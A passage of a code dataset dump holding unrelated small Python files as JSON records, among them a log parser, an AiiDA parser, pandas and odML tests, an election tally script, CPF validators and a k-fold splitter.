(note, max ss is a value that is closest to 0 without being positive)\n\ndef process_line(line):\n\tsum_info = 0\n\tsum_warn = 0\n\tm = MINUS_INFINITY\n\ts_sn = set()\n\ts_si = set()\n\tarr = [(x.strip()[:4], json.loads(x[x.find('{')-1:x.rfind('}')+1].strip())) for x in line.split('_jspService') if x.strip() != '']\n\t\n\tfor x in arr:\n\t\tif x[0] == 'INFO':\n\t\t\tsum_info += 1\n\t\telif x[0] == 'WARN':\n\t\t\tsum_warn += 1\n\t\ts_sn.add(x[1]['sn'])\n\t\ts_si.add(x[1]['ht'][0]['si'])\n\t\tss = x[1]['ht'][0]['ss']\n\t\tif ss > m and ss < 0:\n\t\t\tm = ss\n\t\t\t\n\tprint('INFO',sum_info)\n\tprint('WARN',sum_warn)\n\tprint('number of distinct sn', len(s_sn))\n\tprint('number of distinct si', len(s_si))\n\tprint('max value of ss', m)\n\nwith open(sys.argv[1], 'r') as test_cases:\n\tfor line in test_cases:\n\t\tline = line.rstrip('\\n')\n\t\tif len(line) > 0:\n\t\t\tprocess_line(line)","sub_path":"e_d/prog.py","file_name":"prog.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"403769355","text":"# -*- coding: utf-8 -*-\n\"\"\"\nParsers provided by aiida_diff.\n\nRegister parsers via the \"aiida.parsers\" entry point in setup.json.\n\"\"\"\nfrom __future__ import absolute_import\n\nfrom six.moves import zip\n\nfrom aiida.engine import ExitCode\nfrom aiida.parsers.parser import Parser\nfrom aiida.common import exceptions\nfrom aiida.plugins import CalculationFactory\n\nDiffCalculation = CalculationFactory('diff')\n\n\nclass DiffParser(Parser):\n \"\"\"\n Parser class for parsing output of calculation.\n \"\"\"\n\n def __init__(self, node):\n \"\"\"\n Initialize Parser instance\n \"\"\"\n super(DiffParser, self).__init__(node)\n if not issubclass(node.process_class, DiffCalculation):\n raise exceptions.ParsingError(\"Can only parse DiffCalculation\")\n\n def parse(self, **kwargs):\n \"\"\"\n Parse outputs, store results in database.\n\n :returns: an exit code, if parsing fails (or nothing if parsing succeeds)\n \"\"\"\n from aiida.orm import SinglefileData\n\n # Check that the retrieved folder is there\n try:\n output_folder = self.retrieved\n except exceptions.NotExistent:\n return self.exit_codes.ERROR_NO_RETRIEVED_FOLDER\n\n # Check the folder content is as expected\n list_of_files = output_folder.list_object_names()\n output_files = [self.node.get_option('output_filename')]\n output_links = ['diff']\n # Note: set(A) <= set(B) checks whether A is a subset\n if set(output_files) <= set(list_of_files):\n pass\n else:\n self.logger.error(\n \"Not all expected output files {} were found\".format(\n output_files))\n\n # Use something like this to loop over multiple output files\n for fname, link in zip(output_files, output_links):\n\n with output_folder.open(fname) as handle:\n node = SinglefileData(file=handle)\n self.out(link, node)\n\n return ExitCode(0)\n","sub_path":"aiida_diff/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"338971595","text":"#Concatenating and Appending dataframes - p.5 Data Analysis with Python and Pandas Tutorial\n#\n\nimport pandas as pd\n\ndf1 = pd.DataFrame({'HPI':[80,85,88,85],\n 'Int_rate':[2, 3, 2, 2],\n 'US_GDP_Thousands':[50, 55, 65, 55]},\n index = [2001, 2002, 2003, 2004])\n\ndf2 = pd.DataFrame({'HPI':[80,85,88,85],\n 'Int_rate':[2, 3, 2, 2],\n 'US_GDP_Thousands':[50, 55, 65, 55]},\n index = [2005, 2006, 2007, 2008])\n\ndf3 = 
pd.DataFrame({'HPI':[80,85,88,85],\n 'Int_rate':[2, 3, 2, 2],\n 'Low_tier_HPI':[50, 52, 50, 53]},\n index = [2001, 2002, 2003, 2004])\n\n#Concat adds to the bottom, kucky you if you get indexes right and matching data\n#\n\n\nconcat = pd.concat([df1,df3])\n#print(df1.head())\n#print(df3.head())\n#print(concat)\n#print (df2.head())\n#df4 = df1.append(df3)\n#print (df4)\n\ns = pd.Series([80,2,50], index=['HPI','Int_rate','US_GDP_Thousands']) #adding lines to the dataframe is the 'best way to add data'\ndf4 = df1.append(s, ignore_index=True)\nprint(df4)\n","sub_path":"Pandas_Tut/pandas4.py","file_name":"pandas4.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"612182736","text":"import math,random\n\nf=open('data_binning.csv','r')\ndata=f.readlines()\nlength = 0.3*len(data)\nf=open('sample_random','w')\nnumber=[]\ni=0\nfor _ in range(len(data)):\n\n if i > length:\n break\n num=random.randint(0,len(data))\n if num not in number:\n f.write(data[num])\n number.append(num)\n i=i+1\nf.close()\n","sub_path":"smaple_random.py","file_name":"smaple_random.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"364890719","text":"from gridfs import GridFS\n\n\nclass GridFsFiles:\n # pylint: disable=R0903\n def __init__(self, database):\n self._fs = GridFS(database)\n\n def find(self, file_name):\n grid_out = self._fs.find_one({\"filename\": file_name})\n\n if grid_out is None:\n raise KeyError\n else:\n return grid_out\n","sub_path":"ebl/files/file_repository.py","file_name":"file_repository.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"401593559","text":"#!/usr/bin/env python3.9\n\nimport sys\nimport pandas\n\n\n# Just like sorter except that prefix's are ordered by length from shortest to longest, this allows TCAM tree building\n# to be done in an easy and simple fashion (thanks again to the makers of the pandas module)\n\ndef main(argv):\n if len(argv) != 2:\n print(argv)\n print(\"Incorrect Arg count\")\n exit(1)\n with open(argv[0]) as input_file, open(argv[1], mode='w', newline='') as output_file:\n data = pandas.read_csv(input_file, index_col='Prefix')\n data.sort_values(['Length', 'Prefix'], axis=0, ascending=[True, True], inplace=True)\n data.to_csv(output_file)\n print(f\"Sorted {input_file.name} by prefix length and prefix, output in {output_file.name}\")\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"python_src/reversesorter.py","file_name":"reversesorter.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"392878540","text":"import unittest\nimport samplefile\nimport odml\nimport odml.validation\nimport odml.terminology\nimport odml.mapping\n\nvalidate = odml.validation.Validation\n\nclass TestValidation(unittest.TestCase):\n\n def setUp(self):\n self.doc = samplefile.SampleFileCreator().create_document()\n self.maxDiff = None\n\n def filter_repository_errors(self, errors):\n return filter(lambda x: not \"A section should have an associated repository\" in x.msg, errors)\n\n def filter_mapping_errors(self, errors):\n return filter(lambda x: not x.msg.startswith(\"mapping:\"), errors) \n\n def test_errorfree(self):\n res = validate(self.doc)\n 
self.assertEqual(self.filter_repository_errors(res.errors), [])\n \n def assertError(self, res, err, filter_rep=True, filter_map=False):\n \"\"\"\n passes only if err appears in res.errors\n \"\"\"\n errs = res.errors\n if filter_rep: errs = self.filter_repository_errors(errs)\n if filter_map: errs = self.filter_mapping_errors(errs)\n for i in errs:\n if err in i.msg:\n return\n self.assertEqual(errs, err)\n \n def test_section_type(self):\n doc = samplefile.parse(\"\"\"s1[undefined]\"\"\")\n res = validate(doc)\n # the section type is undefined (also in the mapping)\n self.assertError(res, \"Section type undefined\")\n\n def test_section_in_terminology(self):\n doc = samplefile.parse(\"\"\"s1[T1]\"\"\")\n res = validate(doc)\n self.assertError(res, \"A section should have an associated repository\", filter_rep=False)\n\n odml.terminology.terminologies['map'] = samplefile.parse(\"\"\"\n s0[t0]\n - S1[T1]\n \"\"\")\n odml.mapping.unmap_document(doc)\n doc.sections[0].repository = 'map'\n res = validate(doc)\n # TODO: mappings don't take over the repository attribute yet\n # thus the mapped equivalent of the document would still raise the error\n self.assertEqual(self.filter_mapping_errors(res.errors), [])\n \n def test_uniques(self):\n doc = samplefile.parse(\"\"\"\n s1[t1]\n s1[t1]\n \"\"\")\n res = validate(doc)\n self.assertError(res, \"name/type combination must be unique\")\n\n doc = samplefile.parse(\"\"\"\n s1[t1]\n - p1\n - p1\n \"\"\")\n res = validate(doc)\n self.assertError(res, \"Object names must be unique\")\n \n def test_mapping_errors(self):\n # 1. mappings don't resolve\n doc = samplefile.parse(\"\"\"s1[t1] mapping [T2]\"\"\")\n odml.terminology.terminologies['map'] = samplefile.parse(\"S1[T1]\")\n res = validate(doc)\n self.assertError(res, \"No section of type 'T2' could be found\")\n \n # 2. 
mapped property does not resolve\n doc = samplefile.parse(\"\"\"\n s1[t1]\n - p1 mapping [T1:P1]\n \"\"\")\n res = validate(doc)\n self.assertError(res, \"No property named 'P1' could be found in section 'S1'\")\n \n def test_invalid_mapped_document(self):\n # the following mapping creates an illegal document\n # in which the property P1 is found twice in the same section\n doc = samplefile.parse(\"\"\"\n s1[t1]\n - p1 mapping [T1:P1]\n - P1\n \"\"\")\n odml.terminology.terminologies['map'] = samplefile.parse(\"\"\"\n S1[T1]\n - P1\n \"\"\")\n res = validate(doc)\n self.assertError(res, \"mapping: Object names must be unique\")\n \n def test_property_in_terminology(self):\n doc = samplefile.parse(\"\"\"\n s1[t1]\n - P1\n \"\"\")\n odml.terminology.terminologies['term'] = samplefile.parse(\"\"\"\n S1[T1]\n - P1\n \"\"\")\n doc.repository = 'term'\n res = validate(doc)\n self.assertEqual(res.errors, [])\n \n doc = samplefile.parse(\"\"\"\n s1[t1]\n - p1\n - P1\n \"\"\")\n doc.repository = 'term'\n res = validate(doc)\n self.assertError(res, \"Property 'p1' not found in terminology\")\n\n def test_property_values(self):\n # different units\n doc = samplefile.parse(\"\"\"s1[t1]\"\"\")\n p = odml.Property(name=\"p1\", value=[0,1])\n doc[\"s1\"].append(p)\n p.values[0].unit = \"km\"\n p.values[1].unit = \"mV\"\n res = validate(doc)\n self.assertError(res, \"the same unit\")\n\n del p.values[1]\n # missing dependency\n p.dependency = \"p2\"\n res = validate(doc)\n self.assertError(res, \"non-existant dependency object\")\n \n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"13331790","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright (C) 2015 by Gaik Tamazian\n# gaik (dot) tamazian (at) gmail (dot) com\n\nimport glob\nimport os\nimport logging\nimport tempfile\nimport unittest\nfrom bioformats.gff3 import Gff3Record, Reader, Writer\nfrom bioformats.exception import Gff3Error\ntry:\n import itertools.izip as zip\nexcept ImportError:\n pass\n\npath = os.path.dirname(__file__)\nos.chdir(path)\n\n\nclass TestGff3Reader(unittest.TestCase):\n def setUp(self):\n self.__correct_file = os.path.join(\n 'data', 'gff3', 'correct.gff'\n )\n self.__incorrect_file_dir = os.path.join(\n 'data', 'gff3', 'incorrect_input'\n )\n self.__incorrect_files = glob.glob1(\n self.__incorrect_file_dir, '*.gff')\n # silence the logging messages\n logging.disable(logging.ERROR)\n\n def test_records(self):\n \"\"\"\n Check if the parse reads a file in the GFF3 format in the\n correct way.\n \"\"\"\n # test against the correct input file\n parser = Reader(self.__correct_file)\n for record in parser.records():\n self.assertIsInstance(record, Gff3Record)\n # test against incorrect input files\n for gff_file in self.__incorrect_files:\n parser = Reader(os.path.join(self.__incorrect_file_dir,\n gff_file))\n with self.assertRaises(Gff3Error):\n for _ in parser.records():\n pass\n\n\nclass TestGff3Writer(unittest.TestCase):\n def setUp(self):\n self.__input_file = os.path.join('data', 'gff3', 'correct.gff')\n self.__output_file = tempfile.NamedTemporaryFile().name\n\n def test_write(self):\n \"\"\"\n Check if GFF3 lines are written properly to the output file.\n \"\"\"\n test_input = Reader(self.__input_file)\n with Writer(self.__output_file) as test_output:\n for record in test_input.records():\n 
test_output.write(record)\n\n # compare the test output file to the original one\n with open(self.__input_file) as test_input:\n with open(self.__output_file) as test_output:\n for input_line, output_line in zip(test_input,\n test_output):\n self.assertEqual(input_line, output_line)\n","sub_path":"tests/test_gff3.py","file_name":"test_gff3.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"322706697","text":"import os\nimport csv\ncsvpath = os.path.join(\"election_data.csv\")\n\ndef FindWinner(names, percents):\n win=float(percents[0])\n winner = names[0]\n for count in percents:\n if float(count) > win:\n winner = names[count.index()]\n return winner\n\ncount = 0\nCandidates = []\nCandVote = []\nCandPercent = []\n\nwith open(csvpath,newline='')as csvfile:\n csvreader = csv.reader(csvfile,delimiter=',')\n header = next(csvreader, None)\n for row in csvreader:\n count +=1\n if row[2] not in Candidates:\n Candidates.append(row[2])\n CandVote.append(1)\n else:\n votefor = Candidates.index(row[2])\n CandVote[votefor] += 1\n for votes in CandVote:\n Percent = float(votes/count*100)\n CandPercent.append(Percent)\n winner = FindWinner(Candidates,CandVote)\n\n\nprint(\"Election Results\")\nprint(\"----------------\")\nprint(f\"Total Votes:{count} \")\nprint(\"------------------\")\nfor i in range(len(Candidates)):\n print(f\"{Candidates[i]}: {round(CandPercent[i],2)}% ({CandVote[i]} votes)\")\nprint(\"-------------------\")\nprint(f\"{winner} is the winner.\")\n\n\nf = open(\"Election.txt\", \"w+\")\nf.write(\"Election Results\" \"\\n\")\nf.write(\"----------------\" \"\\n\")\nf.write(f\"Total Votes:{count}\" \"\\n\")\nf.write(\"------------------\" \"\\n\")\nfor i in range(len(Candidates)):\n f.write(f\"{Candidates[i]}: {round(CandPercent[i],2)}% ({CandVote[i]} votes)\" \"\\n\")\nf.write(\"-------------------\" \"\\n\")\nf.write(f\"{winner} is the winner.\" \"\\n\")\nf.close\n","sub_path":"python-challenge/PyPol/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"222991074","text":"#!/usr/bin/env python3\nimport random\n\n# This file is a quick and dirty search + replace for credit card numbers.\n\nwith open('Store1.sql', 'w') as new_file:\n with open('Store.sql', 'r') as old_file:\n for line in old_file:\n new_string = str(random.randint(1247284246323124, 9999999999999999))\n new_file.write(line.replace(\"XYZ\", new_string))\n","sub_path":"SQL/replace.py","file_name":"replace.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"5023993","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 9 14:34:42 2021\n\n@author: irvine\n\"\"\"\n\nfrom random import *\n\nverbs = [\"sitz\",\"schreibt\",\"platziert\",\"unterstützt\"]\nverbp = [\"stehen\",\"gehen\"]\no1 = [\"der Manager\",\"ein Key-Account-Manager\",\"die Innovation\",\"die klügsten Köpfe\"]\no3 = [\"dem Mitarbeiter\",\"den Kunden\",\"dem Wissen\",\"einem Probeunternehmen\"]\no4 = [\"die Zielvorgabe\",\"der Struktur\",\"den Leuten\",\"ein allgemein gültiges Leistungsmodell\"]\nerg = [\"im Rahmen der Dissertationsarbeit\",\"gerade im Top-Management\",\"zum Beispiel\",\"dieses Jahr\",\"heute\",\"morgen\"]\nhs = [\"ja,\",\"das ist definitiv so,\"]\n\ntext = \"\"\nsp = \" \"\n\nNsatz = 1000\n\nfor n in 
range(Nsatz):\n b = randint(1,8)\n if b%3 == 0:\n satz = o1[randint(0,len(o1)-1)] + sp + verbs[randint(0,len(verbs)-1)] + sp + o3[randint(0,len(o3)-1)]\n if b%3 == 1:\n satz = o1[randint(0,len(o1)-1)] + sp + verbs[randint(0,len(verbs)-1)] + sp + o4[randint(0,len(o1)-1)] \n if b%3 == 2:\n satz = erg[randint(0,len(erg)-1)] + sp + verbp[randint(0,len(verbp)-1)] + sp + o1[randint(0,len(o1)-1)] + sp + o3[randint(0,len(o1)-1)]\n if b == 1:\n satz = hs[randint(0,len(hs)-1)] + sp + satz\n satz = satz[0].upper() + satz[1:] + \".\"\n text = text + satz + sp\n if randint(0,20) == 0:\n text = text + \"\\n\\n\"\n \nprint (text)","sub_path":"aschbacher.py","file_name":"aschbacher.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"575534089","text":"import argparse\nimport os\n\n\ndef main():\n day = os.path.basename(__file__).split('-')[0]\n challenge_input = '{}-input.txt'.format(day)\n # challenge_input = '{}-example.txt'.format(day)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--input', default=challenge_input)\n args = parser.parse_args()\n\n lines = []\n with open(args.input, 'r') as infile:\n for line in infile:\n lines.append(line.strip())\n\n ferry = Ferry()\n for instruction in lines:\n ferry.act(Instruction(instruction))\n\n m_dist = abs(ferry.pos.x) + abs(ferry.pos.y)\n print('Ending coords:', ferry.pos)\n print('Manhattan distance:', m_dist)\n\n\nclass Pos:\n def __init__(self, x: int, y: int):\n self.x = x\n self.y = y\n self._hash = y * 100 + x\n\n def __eq__(self, other):\n return self.x == other.x and self.y == other.y\n\n def __repr__(self):\n return '({},{})'.format(self.x, self.y)\n\n def __hash__(self):\n return self._hash\n\n\nclass Instruction:\n def __init__(self, instruction: str):\n self.action = instruction[0]\n self.value = int(instruction[1:])\n\n\nclass Ferry:\n def __init__(self):\n self.pos = Pos(0, 0)\n self.waypoint = Pos(10, 1)\n\n def act(self, instruction: Instruction):\n action: str = instruction.action\n value: int = instruction.value\n\n compass = 'NESW'\n vectors = {\n 'N': Pos(0, 1),\n 'E': Pos(1, 0),\n 'S': Pos(0, -1),\n 'W': Pos(-1, 0),\n }\n\n if action in compass:\n self.waypoint.x += vectors[action].x * value\n self.waypoint.y += vectors[action].y * value\n elif action == 'F':\n self.pos.x += self.waypoint.x * value\n self.pos.y += self.waypoint.y * value\n elif action in 'LR':\n if action == 'L':\n value = 360 - value\n x = self.waypoint.x\n y = self.waypoint.y\n if value == 90:\n self.waypoint = Pos(y, -x)\n elif value == 180:\n self.waypoint = Pos(-x, -y)\n elif value == 270:\n self.waypoint = Pos(-y, x)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"2020/12-2.py","file_name":"12-2.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"526783766","text":"import logging\n\n\nclass PretrainedEmbedderLoader:\n\n @property\n def logger(self):\n return logging.getLogger(__name__)\n\n def __call__(self, handle, other_words_embed_dict, ignore_word_filter=None):\n \"\"\"\nExpects the stream of strings to contain word embedding. 
Each record must be in space separated format with the first column containing the word itself.\nEach record is separated by new lines\ne.g for an embedding of size 10\nzsombor -0.75898 -0.47426 0.4737 0.7725 -0.78064 0.23233 0.046114 0.84014 0.243710 .022978\nsandberger 0.072617 -0.51393 0.4728 -0.52202 -0.35534 0.34629 0.23211 0.23096 0.26694 .41028\n :param other_words_embed_dict: Additional words word embedding, for words not in the handle\n :param ignore_word_filter: Use a filter function to ignore words, return true to ignore a word\n :return: a tuple (word_index_dict, embeddings_array)\n :param handle: handle containing the embedding\n \"\"\"\n word_index_dict = {}\n embeddings_array = []\n other_words_embed_dict = other_words_embed_dict or {}\n\n # Load embeddings from file\n for line in handle:\n values = line.split()\n word = values[0]\n\n # if word needs to be filtered, ignore word\n if ignore_word_filter is not None and ignore_word_filter(word): continue\n\n # Not ignored word\n embeddings = [float(v) for v in values[1:]]\n word_index_dict[word] = len(word_index_dict)\n embeddings_array.append(embeddings)\n\n # Add embeddings for additional words that do not exist in handle\n words_not_in_embedding = set()\n\n for w in other_words_embed_dict.keys():\n # if word needs to be filtered, ignore word\n if ignore_word_filter is not None and ignore_word_filter(w): continue\n\n # Not ignored word\n if word_index_dict.get(w, None) is None:\n word_index_dict[w] = len(word_index_dict)\n embeddings_array.append(other_words_embed_dict[w])\n words_not_in_embedding.add(w)\n\n self.logger.info(\"The number of words intialised without embbeder is {}\".format(len(words_not_in_embedding)))\n self.logger.debug(\"The words intialised without embbeder is \\n {}\".format(words_not_in_embedding))\n\n # Convert to ndarray or cupy\n return word_index_dict, embeddings_array\n","sub_path":"source/algorithms/PretrainedEmbedderLoader.py","file_name":"PretrainedEmbedderLoader.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"202209778","text":"from rest_framework.response import Response\nfrom rest_framework import status\nfrom accounts.models import User\nimport re\n\ndef ValidarCPF(valor):\n\n\t# if User.objects.filter(username=valor).exists():\n\t# \tprint(\"primeiro if\")\n\t# \treturn False\n\n\tvalor = valor.replace('.', '')\n\tvalor = valor.replace('-', '')\n\n\tif not valor.isdigit() or len(valor) != 11:\n\t\tprint(\"segundo if\")\n\t\treturn False\n\n\tcpf_valido = valor[0:9]\n\tbase = 10\n \n\twhile len(cpf_valido) < 11:\n \n\t\tsoma = 0\n\t \n\t\tfor n in cpf_valido:\n\t\t\tsoma += int(n) * base\n\t\t\tbase -= 1\n\t \n\t\tdigito = soma % 11\n\t \n\t\tif digito < 2:\n\t\t\tdigito = 0\n\t\telse:\n\t\t\tdigito = 11 - digito\n\t\t \n\t\tcpf_valido += str(digito)\n\n\t\tbase = 11\n\n\tif cpf_valido == valor:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef ValidarClassificacaoEscola(data):\n\tdata = data.lower()\n\tif data == \"municipal\" or data == \"estadual\":\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef ValidarTipoEscola(data):\n\tdata = data.lower()\n\tif str(data) not in \"escola/creche/pré-escola\":\n\t\treturn False\n\telse:\n\t\treturn True\n\ndef ValidarSenha(data):\n\tif len(data) < 6:\n\t\treturn False\n\telif not re.search(\"[a-z]\", data) and not re.search(\"[A-Z]\", data):\n\t\treturn False\n\telif not any(i.isdigit() for i in data):\n\t\treturn False\n\telse:\n\t\treturn 
True","sub_path":"Prestcon API/school/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"40271848","text":"import asyncio\nimport websockets\nimport uuid\n\nmac_id = ':'.join(['{:02x}'.format((uuid.getnode() >> ele) & 0xff) \nfor ele in range(0,8*6,8)][::-1])\n\n\nasync def hello(websocket, path):\n name = await websocket.recv()\n print(f\"< {name}\")\n await websocket.send(mac_id)\n print(f\"> {mac_id}\")\n\nstart_server = websockets.serve(hello, 'localhost', 8765)\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()","sub_path":"wtsap_socket.py","file_name":"wtsap_socket.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"514459281","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom matplotlib import pyplot as plt\r\nfrom random import random\r\n\r\nx1 = list(range(1,11))\r\ny1 = list(map(lambda x : x * random() + 3, x1))\r\n\r\nx2 = list(range(1,11))\r\ny2 = list(map(lambda x : x * random() + 10, x2))\r\n\r\nplt.title(\"Plot Example\")\r\nplt.xlabel(\"Data 1 ~ 10\")\r\nplt.ylabel(\"Random Data\")\r\n\r\n# 다수개의 그래프를 생성하는 경우\r\n# 서브플롯 설정 방법\r\n# subplot 함수를 사용\r\n# subplot(행,열,위치)\r\n# subplot(행열위치) -> , 없이 사용할 수 있음\r\nplt.subplot(211)\r\nplt.title(\"Plot Example\")\r\nplt.xlabel(\"Data 1 ~ 10\")\r\nplt.ylabel(\"Random Data\")\r\nplt.plot(x1,y1,\"--r\",label=\"First\")\r\nplt.legend(loc=\"upper left\")\r\n\r\nplt.subplot(212)\r\nplt.title(\"Plot Example\")\r\nplt.xlabel(\"Data 1 ~ 10\")\r\nplt.ylabel(\"Random Data\")\r\nplt.plot(x2,y2,\"-.y\",label=\"Second\")\r\nplt.legend(loc=\"upper left\")\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"day_07/matplotlib_09.py","file_name":"matplotlib_09.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"319341142","text":"import os\n\nimport dvc\nimport pytest\nfrom mock import mock_open, patch\n\nfrom dvc.ignore import DvcIgnorePatterns, DvcIgnoreDirs\n\n\ndef mock_dvcignore(dvcignore_path, patterns):\n\n with patch.object(\n dvc.ignore, \"open\", mock_open(read_data=\"\\n\".join(patterns))\n ):\n ignore_patterns = DvcIgnorePatterns(dvcignore_path)\n\n return ignore_patterns\n\n\ndef test_ignore_from_file_should_filter_dirs_and_files():\n dvcignore_path = os.path.join(\n os.path.sep, \"full\", \"path\", \"to\", \"ignore\", \"file\", \".dvcignore\"\n )\n\n patterns = [\"dir_to_ignore\", \"file_to_ignore\"]\n\n root = os.path.dirname(dvcignore_path)\n dirs = [\"dir1\", \"dir2\", \"dir_to_ignore\"]\n files = [\"file1\", \"file2\", \"file_to_ignore\"]\n\n ignore = mock_dvcignore(dvcignore_path, patterns)\n new_dirs, new_files = ignore(root, dirs, files)\n\n assert {\"dir1\", \"dir2\"} == set(new_dirs)\n assert {\"file1\", \"file2\"} == set(new_files)\n\n\n@pytest.mark.parametrize(\n \"file_to_ignore_relpath, patterns, expected_match\",\n [\n (\"to_ignore\", [\"to_ignore\"], True),\n (\"to_ignore.txt\", [\"to_ignore*\"], True),\n (\n os.path.join(\"rel\", \"p\", \"p2\", \"to_ignore\"),\n [\"rel/**/to_ignore\"],\n True,\n ),\n (\n os.path.join(\n os.path.sep,\n \"full\",\n \"path\",\n \"to\",\n \"ignore\",\n \"file\",\n \"to_ignore\",\n ),\n [\"to_ignore\"],\n True,\n ),\n (\"to_ignore.txt\", [\"/*.txt\"], True),\n (\n os.path.join(\"rel\", 
\"path\", \"path2\", \"to_ignore\"),\n [\"rel/*/to_ignore\"],\n False,\n ),\n (os.path.join(\"path\", \"to_ignore.txt\"), [\"/*.txt\"], False),\n (\n os.path.join(\"rel\", \"path\", \"path2\", \"dont_ignore\"),\n [\"rel/**/to_ignore\"],\n False,\n ),\n (\"dont_ignore.txt\", [\"dont_ignore\"], False),\n (\"dont_ignore.txt\", [\"dont*\", \"!dont_ignore.txt\"], False),\n (\"../../../something.txt\", [\"**/something.txt\"], False),\n ],\n)\ndef test_match_ignore_from_file(\n file_to_ignore_relpath, patterns, expected_match\n):\n\n dvcignore_path = os.path.join(\n os.path.sep, \"full\", \"path\", \"to\", \"ignore\", \"file\", \".dvcignore\"\n )\n dvcignore_dirname = os.path.dirname(dvcignore_path)\n\n ignore_file = mock_dvcignore(dvcignore_path, patterns)\n\n assert (\n ignore_file.matches(dvcignore_dirname, file_to_ignore_relpath)\n == expected_match\n )\n\n\n@pytest.mark.parametrize(\"omit_dir\", [\".git\", \".hg\", \".dvc\"])\ndef test_should_ignore_dir(omit_dir):\n ignore = DvcIgnoreDirs([\".git\", \".hg\", \".dvc\"])\n\n root = os.path.join(os.path.sep, \"walk\", \"dir\", \"root\")\n dirs = [omit_dir, \"dir1\", \"dir2\"]\n files = []\n\n new_dirs, _ = ignore(root, dirs, files)\n\n assert set(new_dirs) == {\"dir1\", \"dir2\"}\n","sub_path":"tests/unit/test_ignore.py","file_name":"test_ignore.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"260982334","text":"speech = \"I am happy to join with you today in what will go down in history as the greatest demonstration for freedom in the history of our nation.\"\nd = speech.split()\nword = {}\nalpha={}\nfor i in d:\n key = i.lower()\n if key in word:\n word[key]+=1\n elif key not in word:\n word[key]=1\n for j in range(len(key)):\n if key[j] in alpha:\n alpha[key[j]]+=1\n elif key[j] not in alpha:\n alpha[key[j]]=1\n\n\n\ndef count(item):\n return item[1]\n\n\n\nfor i in sorted(word.items(),key=count):\n print(i)\nfor j in sorted(alpha.items(),key=count):\n print(j)\n","sub_path":"general/WordFreq.py","file_name":"WordFreq.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"265539321","text":"import numpy as np\nfrom sklearn.model_selection import KFold\nimport pandas as pd\nimport random\n\n'''测试数据'''\nrandom.seed(32)\n# df = pd.read_csv('../dataset/train.csv').values\n# rd = random.sample(range(len(df)),len(df))\n# df = df[rd]\n# df = pd.DataFrame({'id':df[:,0],'label':df[:,1]})\n# df.to_csv('../dataset/train_corss_validation',index=False)\n\n\ndf = pd.read_csv('../dataset/train_corss_validation').values\nid,labels = df[:,0],df[:,1]\ndata_size = len(id)\ndef get_kfole(k=5):\n kf = KFold(k)\n fold_num = 0\n for train_index,test_index in kf.split(id):\n train_id,test_id = id[train_index],id[test_index]\n train_label,test_label = labels[train_index],labels[test_index]\n pd.DataFrame({'id':train_id,'label':train_label}).to_csv('../dataset/five_fold/train_kfold_{}.csv'.format(fold_num),index=False)\n pd.DataFrame({'id':test_id,'label':test_label}).to_csv('../dataset/five_fold/test_kfold_{}.csv'.format(fold_num),index=False)\n fold_num += 1\n\nif __name__ == '__main__':\n get_kfole()\n\n\n","sub_path":"scripts/cross_validation.py","file_name":"cross_validation.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"649313303","text":"import numpy as np\nimport 
